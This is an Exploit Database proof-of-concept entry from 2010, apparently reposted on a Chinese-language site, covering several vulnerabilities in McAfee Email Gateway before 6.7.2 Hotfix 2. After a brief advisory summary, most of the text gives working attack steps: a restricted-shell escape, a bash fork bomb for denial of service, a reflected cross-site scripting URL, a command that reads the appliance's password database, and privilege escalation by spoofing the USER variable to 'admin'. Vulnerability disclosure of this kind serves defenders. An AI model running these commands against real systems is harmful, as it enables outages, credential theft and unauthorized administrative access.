McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： Nahuel Grisolia
  日期： 2010-04-06
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33819/

• source: https://www.securityfocus.com/bid/39242/info
  
  McAfee Email Gateway (formerly IronMail) is prone to multiple vulnerabilities, including:
  
  A local privilege-escalation vulnerability
  A denial-of-service vulnerability.
  Multiple cross-site scripting vulnerabilities
  An information-disclosure vulnerability
  
  An attacker may leverage these issues to completely compromise affected computers, execute arbitrary commands and script code, steal cookie-based authentication credentials, crash the affected application and gain access to sensitive information. Other attacks are also possible.
  
  Versions prior to McAfee Email Gateway 6.7.2 Hotfix 2 are vulnerable. 
  
  
  Denial of Service:
  
  * In order to run the DoS, follow the steps below:
  [Secure Mail]: command rbash –noprofile
  [Secure Mail]: :(){:|:&};:
  
  Cross-site scripting 
  
  https://www.example.com/admin/queuedMessage.do?method=getQueueMessages&queueMsgType=<script>alert("XSS");</script>&QtnType=9
  
  Information Disclosure
  
  [Secure Mail]: command rbash –noprofile
  [Secure Mail]: grep -a '.*' /etc/pwd.db
  
  Local Privilege-Escalation: 
  
  [Secure Mail]: command rbash –noprofile
  [Secure Mail]: declare -x USER="admin"
  If you want to check the new privilege:
  [Secure Mail]: cmd_admin set user unlock
  *** Invalid command: Usage - set user unlock <USER ID> ***
  [Secure Mail]: cmd_admin set user unlock admin
  Cannot unlock yourself.
  [Secure Mail]: exi